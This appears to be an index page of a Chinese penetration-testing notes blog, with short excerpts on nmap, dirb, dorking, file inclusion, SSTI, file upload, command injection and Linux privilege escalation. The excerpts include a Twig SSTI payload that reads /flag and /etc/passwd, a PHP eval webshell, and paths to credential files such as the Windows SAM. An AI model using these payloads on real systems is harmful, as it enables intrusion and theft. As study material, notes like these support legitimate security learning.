密码本
密码本
|
0 评论
密码本wordlist简介1、wordlist简称单词表,也可叫密码字典,此工具包含了很多密码2、字典目录路径:/usr/share/wordlist/3、dirb (目录扫描)big.txt #大的字典small.txt #小的字典catala.txt #项目配置字典common.txt #公共字
子域名查找
子域名查找
|
0 评论
子域名查找digdig命令说明查询DNS包括NS记录,A记录,MX记录等相关信息的工具。DNS 记录的类型说明类型A记录: A记录是指定域名对应的IP地址。类型AAAA记录:该记录是将域名解析到一个指定的IPV6的IP上类型CNAME记录:通常称别名解析。可以将注册的不同域名都转到一个域名记录上,由
目录扫描
目录扫描
|
0 评论
dirb简介dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站参数格式:dirb <url_base> [<wordlist_file(s)>] [options]-a 设置user-agent-p <p
端口扫描
端口扫描
|
0 评论
nmap常用命令nmap -sS -sV -p- xxx.xxx.xxx.xxxnmap -v -T4 -A xxx.xxx.xxx.xxxnmap -sT 192.168.96.4  //TCP连接扫描,不安全,慢nmap -sS 192.168.96.4  //SYN扫描,使用最频繁,安全,快n
查询语句
查询语句
|
0 评论
谷歌语法intitle搜索关键词(intitle:variation)只搜索网页标题含有关键词的页面。inurl搜索关键词(intitle:variation)只搜索网页链接含有关键词的页面。intext搜索关键词(intext:variation)只搜索网页body标签中的文本含有关键词的页面。s
文件包含
文件包含
|
WEB |
0 评论
常见的敏感信息路径Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\m
SSTI注入
SSTI注入
|
WEB |
0 评论
phptwig{{self.env.registerUndefinedFilterCallback("exec")}}{{self.env.getFilter("cat /flag")}}{{'/etc/passwd'|file_excerpt(1,30)}}
文件上传
文件上传
|
WEB |
0 评论
PHP一句话木马经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post接收的数据意思为eval把接受的数据当做php代码执行其他函数create_function
命令执行
命令执行
|
WEB |
0 评论
命令执行绕过拼接符号过滤在linux中,&和&&,|和||介绍如下: & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1
Linux提权
Linux提权
|
0 评论
suid提权Linux可执行文件包括: Nmap, Vim, find, Bash, More, Less, Nano, cp1、这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。fin